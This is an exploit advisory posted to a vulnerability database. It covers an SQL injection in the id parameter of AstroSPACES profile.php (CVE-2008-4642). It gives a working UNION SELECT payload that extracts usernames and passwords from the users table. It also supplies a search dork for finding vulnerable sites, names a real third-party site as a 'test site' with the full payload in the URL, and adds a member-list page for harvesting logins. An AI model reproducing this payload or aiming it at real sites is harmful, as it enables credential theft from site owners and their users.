Bug: AstroSPACES (id) Remote SQL Injection Vulnerability (WLB-2008100196 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: AstroSPACES (id) Remote SQL Injection Vulnerability
 Credit: TurkishWarriorr
 Date: 2008.10.22
 CWE: CWE-89 (Show similar)
 CVE: CVE-2008-4642 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

# AstroSPACES (profile.php) SQL

Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr (Sehitler �lmez Vatan Bölünmez
....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :

profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,1
2,13,14+from+users--


test sites:

http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3
a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


E mail login :

http://quirino.com.ph/friendster/space.php?action=memberlist

##########################################################################
www.1923turk.org
turkish-warriorr@hotmail.com

References:

http://www.securityfocus.com/bid/31771
http://www.milw0rm.com/exploits/6758
http://secunia.com/advisories/32290

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com